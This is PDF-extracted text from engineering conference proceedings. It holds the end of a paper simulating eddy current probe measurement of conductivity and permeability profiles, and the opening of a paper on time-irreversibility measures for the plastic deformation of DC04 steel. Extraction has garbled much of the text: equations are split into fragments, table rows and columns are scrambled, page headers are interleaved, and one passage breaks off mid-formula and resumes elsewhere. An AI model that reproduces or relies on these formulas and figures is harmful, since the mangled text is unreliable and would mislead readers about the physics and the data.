∞ ∞ x · J1 (x)dx = x1 · J0 (x1 ) − 2 · J2k+1 (x1 ) − x2 · J0 (x2 ) − 2 · J2k+1 (x2 ) , k=0
x1
Dec =
k=0
(κ · μr1 − λ1 ) · V11 (1) + (κ · μr1 + λ1 ) · V21 (1) · Cs , (κ · μr1 + λ1 ) · V11 (1) + (κ · μr1 − λ1 ) · V21 (1)
V (1) = T (1, 2) · T (2, 3) · · · T (L − 2, L − 1) · T (L − 1, L),
λt+1 1 (−λt+1 +λt )·dt μt · 1+ , ·e 2 μt+1 λt
μt λt+1 1 , T12 (t, t + 1) = · e(λt+1 +λt )·dt 1 − · 2 μt+1 λt
T11 (t, t + 1) =
414
V. Halchenko et al.
λt+1 1 (−λt+1 −λt )·dt μt T21 (t, t + 1) = · e · 1− , 2 μt+1 λt
μt λt+1 1 (λt+1 −λt )·dt 1+ , · T22 (t, t + 1) = · e 2 μt+1 λt
1/2 λt = κ 2 + j · ω · μ0 · μt · σt , where z, r are coordinates of the observation point in a cylindrical coordinate system; J0 (x), J1 (x), Jk (x) are cylindrical Bessel functions of the first kind of zero, first and k-th orders respectively; μ0 = 4·π·10–7 H/m is a magnetic permeability of free space; N is a number of turns of the excitation coil; I is a sinusoidal excitation current with circular frequency ω; r1 , r2 are inner and outer radii of the excitation coil with a rectangular cross section respectively; z1 is a lift-off between the excitation coil and the surface of the test object; z2 is a distance from the top edge of the excitation coil to the surface of the object; μt , μt+1 are magnetic permeabilities of t-th and (t + 1)-th layers respectively; T11 (t, t + 1), T12 (t, t + 1), T21 (t, t + 1), T22 (t, t + 1) are elements of the electrophysical properties matrix of the test object. The model is computationally expensive, it requires the allocation of sufficiently large resources and time for calculations. This is due to the need to calculate an improper integral of the first kind, the integrand of which contains a set of special Bessel functions, including those with a complex argument, as well as an embedded integral of the cylindrical Bessel function. This mathematical model uses piecewise constant representations of continuously changing profiles of electrophysical parameters and, for this reason, requires consideration of a conditionally multilayer near-surface zone of the test object. Moreover, in order to ensure the adequacy of the adopted simplification, it is necessary, in accordance with the recommendations of [20], to select a sufficiently large number of conditional layers, numbering in tens. The computer model is implemented in MathCAD software package and takes into account all the features mentioned above. Verification of the software package has been carried out by modeling the excitation of eddy currents in objects for which there are obtained analytical dependences [27] that allow one to calculate the values of the vector potential of the electromagnetic field in the area of location of the pick-up coil of the eddy current probe. Test mathematical models for one-layer and two-layer test objects have the form: −az −az ∞ J1 (ar) · χ (ar1 , ar2 ) μ0 · i0 e 1 · e 1 − e−az2 · da, (2) · A(r, z, ω) = ·R(a) + F(az1 , az2 , az) 2 a3 0 N ·I , [(r2 − r1 ) · (z2 − z)] ⎧ ea(z2 −z) − ea(z1 −z) z ≥ z2 ⎨ F(az1 , az2 , az) = 2 − ea(z−z2 ) − ea(z1 −z) z2 ≥ z ≥ z1 , ⎩ ea(z−z1 ) − ea(z−z2 ) z1 ≥ z ≥ 0 i0 =
Computer Simulation of the Process of Profiles Measuring
χ (x1 , x2 ) =
x2
415
x · J1 (x)dx,
x1
where R(a) is a reflection coefficient. The formulas for determining this coefficient for one-layer and two-layer test objects respectively are given below: R(a) = R(a) =
a − b1 , a + b1
(a + b1 ) · (b1 − b2 ) · e−2α1 ·d1 + (a − b1 ) · (b1 + b2 ) , (a − b1 ) · (b1 − b2 ) · e−2α1 ·d1 + (a + b1 ) · (b1 + b2 ) αn = a2 + j · ω · μ0 · μn · σn , bn =
αn , n = 1, 2, μn
where μn is a relative magnetic permeability of the material layer; σn is an electrical conductivity of the material layer; d1 is a thickness of the first layer of material. The initial data used in the test calculations are as follows: r1 = 32·10–3 m; r2 = 50·10–3 m; z1 = 5·10–4 m; z2 = 18.5·10–3 m; d1 = 1.5·10–3 m; f = 1·103 Hz; N = 100; I = 1 A. Electrophysical parameters of media for a single-layer test object: μ1 = 2; σ1 = 6·106 S/m and for a two-layer test object: μ1 = 1; μ2 = 1; σ1 = 9·106 S/m; σ2 = 5·106 S/m. The coordinates of the observation point of the vector potential: r = 25 10–3 m, z = 0.25 10–3 m. The results of calculations using two models [26] and [27] are summarized in Table 1, which also shows the relative errors characterizing the accuracy of the calculations. Comparative results confirm the adequacy of the created software. Table 1. Verification results for the computer model Control object properties
model [27]
single layer 5.937182·10–6 –4.869612·10−6 i two-layer
model [26]
relative error, δ % amplitude/phase
5.943273·10–6 –4.869635·10−6 i
0.102/3.9·10–4
3.707182·10–6 –4.03023·10−6 i
1.34·10–5 /4.9·10–6
Calculation of the vector potential A, (Wb/m)
3.707182·10–6 –4.03023·10−6 i
416
V. Halchenko et al.
3 Experiments The developed computer model makes it possible to carry out research on distinguishing profiles of electrophysical parameters when performing measurements with a surface eddy current probe. It is of interest to carry out computational experiments for both magnetic and non-magnetic materials. For modeling we will set one of the possible types of profiles proposed in [20]: − z2 σ (z) = σin + σfin − σin · e g 2 ,
(3)
− z2 μ(z) = μin + μfin − μin · e g 2 , where σin , μin are initial values of conductivity and permeability respectively; σfin , μfin are finite values of conductivity and permeability respectively; g is an approximation parameter, g = 0.001 (for σ (z)), g = 0.002 (for μ(z)). We will choose the profiles contained in Table 2 as the basic ones for further research. Table 2. Basic conductivity and permeability profiles for 30 layers № μ - profile 6
1
2
3
4
5
6
…
29.928
29.711
29.355
28.863
28.243
27.504
…
,
σ·- profile ×10 , S/m 7.922389 7.694158 7.328663 6.846722 6.274646 5.641875 … …
13
14
15
16
17
18
19
20
21
…
…
20.007 18.766 17.524 16.291 15.081
…
1.6392521.2986961.0221140.8029770.63349450.50547840.41100440.3428620.29481…
13.901
12.761
11.669 10.629 …
…
23
24
25
26
27
28
29
30
…
8.728
7.871
7.079
6.351
5.687
5.085
4.542
4.057
…
0.239326 0.224588 0.215057 0.209042 0.205322 0.20307 0.201736 0.200962
Electromotive force induced in the pick-up coil of the probe with the number of turns equal to 50, radius r = 25 10–3 m and located at a height z = 0.25 10–3 m, is determined in accordance with the expression: Adl = j · ω · 2 · π · r · A(r, z), E =j·ω lcoil
where lcoil is a contour of the pick-up coil of the eddy current probe.
Computer Simulation of the Process of Profiles Measuring
417
Table 3 and Table 4 contain profiles of electrical conductivity and permeability respectively, close to the base ones, which have been obtained from the initial ones as a result of minor changes in σin , σfin , and μin , μfin followed by calculations using relations (2). Table 3. Modified conductivity profiles for 30 layers №/profile
1 6
Profile 1, ×10
2
3
4
5
6
7
…
8.001613 7.771099 7.40195 6.915189 6.337393 5.698294 5.028271 …
Profile 2, ×106 8.16006 7.924982 7.548523 7.052123 6.462885 5.811132 5.122784 … Profile 3, ×106 8.159941 7.924512 7.54749 7.050349 6.460231 5.807504 5.123192 … …
11
…
2.551198 2.068517 1.655645 1.311683 1.032335 0.811006 0.639829 0.510533 …
12
13
…
2.601717 2.109478 1.688843 1.337657 1.052777 0.827066 0.652499 0.520642 …
…
2.593295 2.100321 1.678644 1.327347 1.042042 0.815993 0.641166 0.509112 …
…
22
23
24
14
15
25
16
26
17
27
28
18
29
…
30
…
0.264292 0.241719 0.226824 0.217208 0.211132 0.207375 0.205101 0.203753 0.202972
…
0.269525 0.246505 0.231316 0.221509 0.215313 0.214818 0.209162 0.207788 0.206991
…
0.257620 0.234566 0.234566 0.219353 0.203327 0.19949 0.197167 0.195791 0.194993
Table 4. Modified permeability profiles for 30 layers №/profile 1
2
3
4
5
6
7
… 15
16
17
Profile 1
30.227 30.009 29.648 29.152 27.779 26.923 25.696 … 17.699 16.454 15.231
Profile 2
30.825 30.603 30.235 29.729 29.09
Profile 3
30.825 30.602 30.234 29.726 29.086 28.324 27.449 … 18.024 16.752 15.050
18
19
14.04
12.889 11.785 10.735 9.744 8.8157.95
20
21
22
23
24
28.329 27.456 … 18.049 16.78 15.533
25
26
7.15
6.415 5.744 5.136 4.588 4.097
27
28
29
30
14.318 13.144 12.019 10.948 9.937 8.9898.107 7.291 6.542 5.858 5.237 4.679 4.178 14.285 13.108 11.98
10.908 9.895 8.9458.061 7.244 6.493 5.807 5.186 4.626 4.125
418
V. Halchenko et al.
The profiles have been created as follows: profile 1 by increasing σin and σfin by 1% with subsequent calculation; profile 2 similar, but by 3%; profile 3 by increasing σin and decreasing σfin by 3%. The sense of model experiments is to simulate measurements when varying profiles with fixing the values of the output signal of the probe and subsequent conclusions about the possibility of distinguishing profiles. The simulation has been carried out at different frequencies of excitation of eddy currents.
4 Results First of all, we will carry out calculations for objects made of non-magnetic material, i.e. when the relative magnetic permeability takes a single value for all layers of the material. The simulation results are presented in Fig. 1 and Table 5, which illustrates the values of the probe’s signals at different excitation frequencies, as well as the difference signals for objects with different profiles (Fig. 2 and Table 6). Table 5. Electromotive force of the eddy current transducer at different excitation frequencies Frequency f, kHz Basic Profile
Profile 2
Signal amplitude, Signal phase, rad Signal amplitude, Signal phase, rad V V 1
0.69
2.235
0.682
2 3
2.248
0.96
2.539
0.94
2.553
1.033
2.71
1.025
2.713
4
1.055
2.795
1.045
2.797
5
1.075
2.833
1.043
2.837
6
1.067
2.85
1.034
2.851
7
1.059
2.849
1.027
2.848
8
1.053
2.838
1.022
2.835
9
1.051
2.821
1.02
2.815
10
1.052
2.799
1.023
2.792
15
1.1
2.676
1.075
2.665
20
1.189
2.568
1.166
2.557
Computer Simulation of the Process of Profiles Measuring
419
Fig. 1. Measurement simulation results for an object with basic profiles of electrophysical parameters and the corresponding profile 1 of an object made of non-magnetic material
Table 6. Difference signal for a pair of profiles of non-magnetic test object at different excitation frequencies Frequency f, kHz
Signal amplitude difference, V
Signal phase difference, rad
Profiles 1–2
Profiles 1–3
Profiles 2–3
Profiles 1–2
Profiles 1–3
Profiles 2–3
1
0.005
0.001
−0.004
−0.008
−0.004
0.004
2
0.013
0.005
−0.008
−0.009
−0.007
0.002
3
0.017
0.008
−0.009
−0.007
−0.008
−0.001
4
0.02
0.011
−0.009
−0.004
−0.007
−0,003
5
0.021
0.013
−0.008
−0.002
−0.006
−0.004
6
0.022
0.014
−0.008
−0.001
−0.006
−0.005
7
0.021
0.015
−0.006
0.001
−0.005
−0.006
8
0.02
0.015
−0.005
0.002
−0.004
−0,006
9
0.02
0.015
−0.005
0.004
−0.002
−0.006 (continued)
Similar calculations for objects made of magnetic material are shown in Fig. 3 and Table 7 with the only difference that permeability profile 3 (Table 4) is generated with
420
V. Halchenko et al. Table 6. (continued)
Frequency f, kHz
Signal amplitude difference, V
Signal phase difference, rad
Profiles 1–2
Profiles 1–3
Profiles 2–3
Profiles 1–2
Profiles 1–3
Profiles 2–3
10
0.019
0.016
−0.003
0.005
−0.001
−0.006
15
0.017
0.017
0
0.007
0.001
−0.006
20
0.015
0.016
0.001
0.007
0.003
−0.004
Fig. 2. Difference results of modeling measurements for objects made of non-magnetic material with different conductivity and permeability profiles
5% increase in μin and μfin . When modeling, the conductivity profile is fixed at the level of the basic one, and only the magnetic permeability profiles are changed. An analysis of the presented results of computational experiments allows us to approximately estimate the sensitivity of the probe to the distinction of electrophysical parameters profiles in the measurement control of objects made of magnetic and non-magnetic materials.
Computer Simulation of the Process of Profiles Measuring
421
Table 7. Difference signal for a pair of profiles of magnetic test object at different excitation frequencies Frequency f, kHz
Signal amplitude difference, V
Signal phase difference, rad
Profiles 1–2
Profiles 1–3
Profiles 2–3
Profiles 1–2
Profiles 1–3
Profiles 2–3
1
−0.002
−0.005
−0.003
0.003
0.006
0.003
2
−0.008
−0.016
−0.008
0.003
0.007
0.004
3
−0.014
−0.027
−0.013
0.003
0.006
0.003
4
−0.018
−0.035
−0.017
0.003
0.006
0.003
5
−0.022
−0.043
−0.021
0.003
0.005
0.002
6
−0.025
−0.05
−0.025
0.002
0.004
0.002
7
−0.028
−0.055
−0.027
0.002
0.004
0.002
8
−0.033
−0.06
−0.027
0.001
0.003
0.002
9
−0.032
−0.064
−0.032
0.001
0.003
0.002
10
−0.035
−0.069
−0.034
0.001
0.003
0.002
15
−0.045
−0.089
−0.044
0.001
0.003
0.002
20
−0.054
−0.106
−0.052
0.001
0.001
0
5 Discussion Although the performed studies are selective and cannot be called complete, nevertheless, they allow us to draw certain conclusions about the features of the solving measurement problem. First of all, we note that, despite minor variations in the parameters in the modified profiles, and this in absolute units primarily refers to the magnetic permeability profiles, changes in the amplitude of the output signal of the probes acceptable for fixing are observed. For non-magnetic materials they are from units to tens of mV; for magnetic ones – units of mV. In addition, the existence of certain frequency ranges of excitation of eddy currents is observed, in which the sensitivity of the probes to the analyzed profiles is higher than at other frequencies. For non-magnetic materials this range is 3–8 kHz, and for magnetic materials it is 8–10 kHz. Note that the choice of these frequency ranges has to be carried out by compromise solutions. More accurate recommendations can be obtained as a result of model calculations in accordance with the developed plan of computer experiments based on the theory of their planning. And this can be done using the created computer model of the profile measurement process, which is also expedient to use as an “accurate” electrodynamic model when constructing a highly efficient neural network metamodel necessary for solving the inverse problem.
422
V. Halchenko et al.
Fig. 3. Difference results of simulation of measurements for objects made of magnetic material with different conductivity and permeability profiles
6 Conclusions The main results of the study are as follows: • The computer model of the measurement process with a surface eddy current probe has been created and verified in simple cases when the near-surface layer of the test object is represented by one- and two-layer approximation. • The sensitivity in various frequency modes of excitation of eddy currents in magnetic and non-magnetic test objects to distinguish slightly different profiles of electrophysical parameters has been studied. • The rational frequency ranges of excitation of the surface probe have been determined, which provide the maximum possible levels of the output signal. The results of the study further can be used in the construction of metamodels of the physical process of measuring the electrophysical characteristics of the near-surface layer of the test object with a surface eddy current probe.
Computer Simulation of the Process of Profiles Measuring
423
References 1. Sabbagh, H.A., Murphy, R.K., Sabbagh, E.H., et al.: Computational Electromagnetics and Model-Based Inversion. SCIENTCOMP. Springer, New York (2013). https://doi.org/10.1007/ 978-1-4419-8429-6 2. Liu, G.R., Han, X.: Computational Inverse Techniques in Nondestructive Evaluation. CRC Press, Boca Raton (2003). https://doi.org/10.1201/9780203494486 3. Lu, M., Meng, X., Chen, L., et al.: Measurement of ferromagnetic slabs permeability based on a novel planar triple-coil sensor. IEEE Sens. J. 20(6), 2904–2910 (2020). https://doi.org/ 10.1109/JSEN.2019.2957212 4. Lahrech, A.C., Abdelhadi, B., Feliachi, M., et al.: Electrical conductivity identification of a carbon fiber composite material plate using a rotating magnetic field and multi-coil eddy current sensor. Eur. Phys. J. Appl. Phys. 83(2), 20901 (2018). https://doi.org/10.1051/epjap/ 2018170411 5. Avila, J.R.S., How, K.Y., Lu, M., Yin, W.: A novel dual modality sensor with sensitivities to permittivity, conductivity, and permeability. IEEE Sens. J. 18(1), 356–362 (2017). https:// doi.org/10.1109/JSEN.2017.2767380 6. Lu, M., Xie, Y., Zhu, W., et al.: Determination of the magnetic permeability, electrical conductivity, and thickness of ferrite metallic plates using a multifrequency electromagnetic sensing system. IEEE Trans. Industr. Inf. 15(7), 4111–4119 (2018). https://doi.org/10.1109/TII.2018. 2885406 7. Lu, M., Meng, X., Huang, R., et al.: Measuring lift-off distance and electromagnetic property of metal using dual-frequency linearity feature. IEEE Trans. Instrum. Meas. 70, 1–9 (2020). https://doi.org/10.1109/TIM.2020.3029348 8. Lu, M., Zhu, W., Yin, L., et al.: Reducing the lift-off effect on permeability measurement for magnetic plates from multifrequency induction data. IEEE Trans. Instrum. Meas. 67(1), 167–174 (2017). https://doi.org/10.1109/TIM.2017.2728338 9. Lu, M., Huang, R., Yin, W., et al.: Measurement of permeability for ferrous metallic plates using a novel lift-off compensation technique on phase signature. IEEE Sens. J. 9(17), 7440– 7446 (2019). https://doi.org/10.1109/JSEN.2019.2916431 10. Lu, M., Xu, H., Zhu, W., et al.: Conductivity lift-off invariance and measurement of permeability for ferrite metallic plates. NDT & E Int. 95, 36–44 (2018). https://doi.org/10.1016/j. ndteint.2018.01.007 11. Yin, W., Meng, X., Lu, M., et al.: Permeability invariance phenomenon and measurement of electrical conductivity for ferrite metallic plates. Insight - Non-Destruct. Test. Cond. Monit. 61(8), 472–479 (2019). https://doi.org/10.1784/insi.2019.61.8.472 12. Halchenko, V.Y., Tychkov, V.V., Storchak, A.V., Trembovetska, R.V.: Reconstruction of surface radial profiles of the electrophysical characteristics of cylindrical objects during eddy current measurements with a priori data. The selection formation for the surrogate model construction. Ukr. Metrol. J. 1, 35–50 (2020). https://doi.org/10.24027/2306-7039.1.2020. 204226 13. Halchenko, V.Y., Storchak, A.V., Trembovetska, R.V., Tychkov, V.V.: The creation of a surrogate model for restoring surface profiles of the electrophysical characteristics of cylindrical objects. Ukr. Metrol. J. 3, 27–35 (2020). https://doi.org/10.24027/2306-7039.3.2020.216824 14. Halchenko, V.Ya., Trembovetska, R.V., Tychkov, V.V., et al.: Additive neural network approximation of multidimensional response surfaces for surrogate synthesis of eddy-current probes. Przegl˛ad Elektrotech. 9, 46–49 (2021). https://doi.org/10.15199/48.2021.09.10 15. Jiang, P., Zhou, Q., Shao, X.: Surrogate-Model-Based Design and Optimization. Springer Tracts in Mechanical Engineering. Springer, Singapore (2020). https://doi.org/10.1007/978981-15-0731-1
424
V. Halchenko et al.
16. Forrester, A.I.J., Sóbester, A., Keane, A.J.: Engineering Design Via Surrogate Modelling: A Practical Guide. Wiley, Chichester (2008). https://doi.org/10.1002/9780470770801 17. Bartz-Beielstein, T., Naujoks, B., Stork, J., Zaefferer, M.: Tutorial on surrogate-assisted modelling. D1.2. Synergy for Smart Multi-Objective Optimisation, Horizon 2020 (2016) 18. Georgiev, P.: Sensitivity analyses and robust ship design based on metamodels. Dissertation, Technical-University-of-Varna (2008). http://dx.doi.org/10.13140/2.1.2639.1367 19. Theodoulidis, T.P., Kriezis, E.E.: Eddy Current Canonical Problems (with Applications to Nondestructive Evaluation). Tech Science Press, Forsyth (2006) 20. Uzal, E.: Theory of eddy current inspection of layered metals. Dissertation, Iowa State University (1992) 21. Bowler, N.: Eddy-Current Nondestructive Evaluation. SSMST. Springer, New York (2019). https://doi.org/10.1007/978-1-4939-9629-2 22. Lei, Y.Z.: General series expression of eddy-current impedance for coil placed above multilayer plate conductor. Chin. Phys. B 27(6), 060308 (2018). https://doi.org/10.1088/16741056/27/6/060308 23. Zhang, J., Yuan, M., Xu, Z., Kim, H.-J., Song, S.-J.: Analytical approaches to eddy current nondestructive evaluation for stratified conductive structures. J. Mech. Sci. Technol. 29(10), 4159–4165 (2015). https://doi.org/10.1007/s12206-015-0910-7 24. Theodoulidis, T.: Impedance of a coil above a planar conductor with an arbitrary continuous conductivity depth profile. Int. J. Appl. Electromagn. Mech. 59(4), 1179–1185 (2019). https:// doi.org/10.3233/JAE-171122 25. Sun, J.L., Li, Z.L., Yuan, Y.M.: Construction and verification of analytical model for eddy current testing based on multi-layered conductive structures. Adv. Mater. Res. 1006–1007, 833–840 (2014). https://doi.org/10.4028/www.scientific.net/AMR.1006-1007.833 26. Tychkov, V.V., Halchenko, V.Ia., Trembovetska, R.V., Tychkova, N.B.: Modeling the output signal of the eddy current probe using the Dood’s model. In: IX International Scientific and Technical Conference on Sensors, Devices and Systems-2021, pp. 7–9 (2021). https://er. chdtu.edu.ua/handle/ChSTU/3360. [in Ukr.] 27. Li, Y.: Theoretical and experimental investigation of electromagnetic NDE for defect characterization. Dissertation, Newcastle University (2008)
Irreversibility of Plastic Deformation Processes in Metals Arnold Kiv1,2 , Arkady Bryukhanov2 , Andrii Bielinskyi3 , Vladimir Soloviev3(B) , Taras Kavetskyy4,5 , Dmytro Dyachok2 , Ivan Donchev2 , and Viktor Lukashin2 1 Ben-Gurion University of the Negev, Beer Sheva, Israel 2 South Ukrainian National Pedagogical University named after K.D. Ushynsky, Odesa, Ukraine 3 Kryvyi Rih State Pedagogical University, Kryvyi Rih, Ukraine
[email protected] 4 Drohobych Ivan Franko State Pedagogical University, Drohobych, Ukraine 5 The John Paul II Catholic University of Lublin, Lublin, Poland
Abstract. The process of plastic deformation of steel DC04 is considered a complex, non-linear, irreversible, and self-organized process. An analysis of the irreversibility of the stress-strain time series makes it possible to identify characteristic areas of (quasi-)elastic, plastic deformation, and necking. The last two sections are the most informative. The region of inelastic deformation is characterized by collective self-organized processes of dislocation structures transformation, turning into pore formation and, ultimately, the formation of microcracks and a general crack as the cause of sample failure. Measures for the quantitative assessment of the irreversibility of the deformation process are proposed. Such measures as multiscale asymmetry, Poincaré, network-, and permutation-based measures are found to be especially informative measures, which can be used not only to classify the stages of plastic deformation but also can be applied as a precursor of the material irreversible destruction process. Keywords: Complex systems · plastic deformation · dislocation · network measures · permutation indicators · self-organization
1 Introduction It should be noted that due attention has been paid to the problems of complexity in the last half century. There are known fundamental works in this direction by P. Anderson [1], M. Gell-Mann [24], I. Prigogine [48], G. Parisi [45]. With an obvious variety of definitions, the science of complexity is understood as a large set of components that locally interact with each other on small scales, and can spontaneously self-organize, demonstrating non-trivial global structures and behavior on large scales, often without external intervention. They are also non-linear, heterogeneous, and far from equilibrium, as well as being adaptive as they develop, and may contain selfmanaging feedback loops. The properties of a complex system cannot be understood or predicted only regarding complete knowledge of its components, and its study requires new mathematical frameworks and scientific methodologies [34]. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 425–445, 2023. https://doi.org/10.1007/978-3-031-35467-0_26
426
A. Kiv et al.
A non-exhaustive list of complex systems includes, among others (in fact, most systems can be considered as complex systems): geophysical processes (earthquakes), biophysics (brain dynamics, DNA), space plasma (solar wind, solar flares, Earth’s magnetosphere), plastic deformation of materials, economics (stock indices), socio-technical systems and many others [53]. In addition, for the analysis of experimental data (time series) of complex systems, new concepts and sophisticated mathematical tools have been developed to extract important information about the underlying dynamics of the observed signals. The theory of complex networks that has appeared in recent years and is actively developing has significantly expanded the tools for analyzing time series by transforming them into one of the complex networks variety [63]. One of the fundamental problems of physical materials science is the explanation of the complex regularities observed in the experiment for the emergence and development of defect structures that form during the plastic deformation of a material. A deformable material is a complex dynamic system in which, under the influence of an external load, the material is transferred to a state far from thermodynamic equilibrium. This leads to the development of dissipative instabilities in the system, leading to the formation of various types of inhomogeneous defect structures, including dislocation structures. Plastic deformation of metals is spatially inhomogeneous and discontinuous in time due to the discrete nature of plasticity carriers – lattice dislocations [60]. The discreteness of dislocation processes is the root cause of local fluctuations in stresses and strains. However, a typical stress-strain curve taken with the accuracy of modern equipment turns out to be smooth. The reason for this is that the global stress-strain curve is the result of averaging over the deformed volume and time, and as such does not reveal the discontinuity of plastic flow. However, the rate of change of this curve contains fluctuations, the analysis of the time series of which makes it possible to obtain far from obvious information [34]. The non-equilibrium dissipative systems are characterized by the irreversibility of time, and the loss of this fundamental property may be an indicator of the development of destructive processes [9, 10]. The development of irreversibility during the destruction of the material may appear to be a warning signal of complete breaking. The aim of this study is to analyze the irreversibility regimes of the time series of the stress-strain curve σ () and present the indicators (indicators-precursors) of destructive processes related to the concept of irreversibility.
2 Materials and Methods Considering the statistical properties of a signal under study, its evolution could be called irreversible if there is a lack of invariance, i.e., the signal is time-reversible if a series {x1 , x2 , . . . , xn } and its inverse version {xn , xn−1 , . . . , x1 } are equally likely to occur. The function f (·) could be applied to find characteristics that differ forward and backward versions, i.e., time series is reversible if f (X d ) = f (X r ). Therefore, the opposite relation is true for irreversible processes: if f (X d ) = f (X r ), the process is (statistically) time-irreversible [18]. The main idea of this definition – there are no restrictions on f (·).
Irreversibility of Plastic Deformation Processes in Metals
427
Our study implies that a stationary process X is called statistically inverse in time if the probability distributions of some quantities for the initial and time-reversal system remain approximately the same [14, 18, 62]. Reversible systems are expected to consist of white noise and presented to be linearly correlated Gaussian processes. The irreversibility of time series indicates the presence of nonlinear dependencies (memory) [49] in the dynamics of a system far from equilibrium, including non-Gaussian (linear or nonlinear) random processes, dissipative chaos, or linear autoregressive moving average (ARMA) models as possible generative processes of such irreversible dynamics [12, 37, 58]. Various systems represent asymmetric patterns in their evolution. As an example, Ji and Shang [26] studied the possibility of using KLD for the detection and isolation of a sensor precision degradation fault. Shaohua et al. [52] presented the hybrid damage index on the basis of KLD and its approximations for detecting damage in one-dimension structure and delamination in laminated composite. Osara and Bryant [44] presented a new instantaneous fatigue model and predictor based on irreversible thermodynamics, which combines the first and second laws of thermodynamics with the Helmholtz free energy. Then, the result was applied to the degradation-entropy generation theorem to relate a desired fatigue measure to the loads, materials, and environmental conditions via the irreversible entropies generated by dissipative processes that degrade the fatigue material. Filippatos et al. [17] presented a vibration-based damage identification method that takes into consideration the gradual damage behavior and the resulting changes in the structural dynamic behavior of composite rotors. A diagnostic system was based on KLD, the two-sample Kolmogorov-Smirnov test, and a statistical hidden Markov model. Li and Shang [38] presented multiscale higher moments KLD to make the variation of irreversibility more obvious and study it for different scales with the usage of the coarsegraining procedure. Qiu et al. [50] applied KLD as a degradation index to estimate the structure damage by measuring the difference between the baseline Gaussian Mixture Model and the on-line Gaussian Model. Kahirdeh et al. [28] presented a parametric approach to estimating the acoustic entropy detected over the course of fatigue damage. Information entropy and relative entropy were estimated through a parameter approach. The evolution trends of both methods showed the stages of fatigue damage. Basaran and Nie [3] developed a thermodynamic framework for damage mechanics of solid materials, where entropy production was used as the sole measure of damage evolution in the system. Boschan et al. [8] investigated irreversibility in soft frictionless disk packings on approach to the unjamming transition. Kostina and Plekhov [33] presented a theoretical approach for the calculation of entropy in metals under plastic deformation. With the thermodynamic analysis of the plastic deformation process, they obtained the expression for the determination of the entropy production. For measuring the dependence among different degradation processes, Sun et al. [59] adopted copula entropy, which is a combination of the copula function and information entropy. Delpha et al. [13] developed a fault detection and isolation method based on data-drive approaches: the Principal Component Analysis and KLD, which were used for feature extraction and comparison of the probability density function of the latent scores. Here [42], the authors presented a new technique for the construction of a concrete-beam health indicator based on the KLD and deep learning.
428
A. Kiv et al.
As has been mentioned previously, in this paper we present some of the techniques mentioned in a short literature review such as KLD. Next, we would like to present the measures of irreversibility based on permutation patterns and network quantities in the combination with the information theory. Moreover, we present Poincaré-based indicators of irreversibility and multiscale index of asymmetry. By constructing irreversibility indicators for the stress-strain curve based on different approaches and using the sliding window of different lengths, first of all, we demonstrate the versatility and stability of the presented measures regardless of the length of the series. Secondly, the presented work presents prospects for constructing precursors of catastrophic processes during the destruction of metals. 2.1 Permutation-Based Irreversibility The idea of analyzing the permutation patterns (PP) was initially introduced by Bandt and Pompe [2] to provide researchers with a simple and efficient tool to characterize the complexity of the dynamics of the real systems. Concerning other approaches, such as entropies, fractal dimensions, or Lyapunov exponents, it avoids amplitude threshold and instead of dealing with casual values inherited from time series dynamics, deals with ordinal permutation patterns. Their frequencies allow us to distinguish deterministic processes from completely random ones. The calculations of PP assume that the time series X = {x(i)|i = 1, . . . , N } is − → partitioned in overlapping subvectors X (i) = {x(i), x(i + τ ), . . . , x(i + [dE − 1]τ )}, where dE is the length of corresponding vectors (number of elements to be compared) and τ is the embedding delay that controls time separation between elements. procedure, each subvector is mapped to an ordinal PP π = After the embedding r0 , r1 , . . . , rdE −1 of {0, 1, . . . , dE − 1}, which has to fulfill the condition x(i + r0 ) ≤ x(i + r1 ) ≤ · · · ≤ x(i + rdE −1 ). Interesting for us measure of time irreversibility based on PP can be derived from taking into account their relative frequency for both initial and reversed time series. Correspondingly, if both types have approximately the same probability distributions of their patterns, the time series is presented to be reversible, and the opposite conclusion for the other case. The difference between distributions of direct (Pd ) and reversed (Pr ) time series can be estimated via the Eq. (3). For both permutation- and network-based quantities, we will utilize the probability density functions (PDFs) of the mentioned quantities. If our system is presented to be time-reversible, we conjecture that probability distributions of forward and backward in time characteristics should be the same. For irreversible processes, we expect to find statistical non-equivalence. According to [62], this deviation will be defined through Kullback-Leibler divergence: N p(xi ) , (1) p(xi ) × log DKL (p||q) = i=1 q(xi )
Irreversibility of Plastic Deformation Processes in Metals
429
for which p responds to a distribution of the retarded characteristics and q is of the advanced. Besides, the similarity of both quantities can be assessed through the JensenShannon distance [21]: DKL (p||m) + DKL (q||m) /2, JS(p||q) = (2) where m = 21 (p + q), and DKL (·) is the Kullback-Leibler divergence. Specifically, as the relative frequency of the PP for the initial time series becomes the same for the inverse time series, reversibility implies equality of both distributions, and these distances converge to zero. For the permutation-based irreversibility, we tested different combinations of the embedding dimension and time delay. The experiments were performed for dE ∈ {4, 5} and τ ∈ {3, . . . , 15}. We found that dE = 4 and τ = 15 give the most robust results across all sliding window sizes. 2.2 Complex Network Methods Visibility graphs (VGs) are based on a simple mapping from the time series to the network domain exploiting the local convexity of scalar-valued time series {xi |i = 1, . . . , N }, where each observation xi is a vertex in a complex network. Two vertices i and j are linked edge (i, j) if for all vertices k with ti < tk < tj the condition xk
g(t + τ )). By assessing the asymmetry of points in the diagram, we can derive various quantitative measures of irreversibility (asymmetry) of the studied systems. For all of the presented Poicaré-based indicators, except Costa’s index and asymmetry index, τ = 1. Thus, in the Poicaré diagram we will access the overall asymmetry regarding the current and the next state. Figure 1 represents the Poicaré diagram for standardized returns of the stress-strain curve.
Fig. 1. The Poincaré plot of the standardized returns g(t) for the stress-strain curve. The solid line represents the line of identity. Each dot is the representation of consequent values (g(t), g(t + τ ))
From Fig. 1 we see that one of the presented points is followed by the transition from, approximately, 76σ for g(t) to 6σ for g(t + τ ). Such events and the presented distribution of points on the Poincare diagram are confirmation that the system we are studying is characterized by irreversibility: the nonlinearity of the studied processes and their randomness (sensitivity to certain conditions).
Irreversibility of Plastic Deformation Processes in Metals
431
2.3.1 Porta’s Index (PIx) PIx [47] was defined as the number of points below LI divided by the total number of points in the Poincaré plot except those that are located on LI, specifically PIx =
b , m
(5)
where b = C Pi− is the number of points below LI, and m = C Pi+ + C Pi− is the total number of points below and above LI. 2.3.2 Guzik’s Index (GIx) GIx was defined as the distance of points above LI divided by the distance of all points in the Poincaré plot except those that are located on LI [9, 22]. Specifically, a + 2 Di GIx = i=1 , m 2 i=1 (Di )
(6)
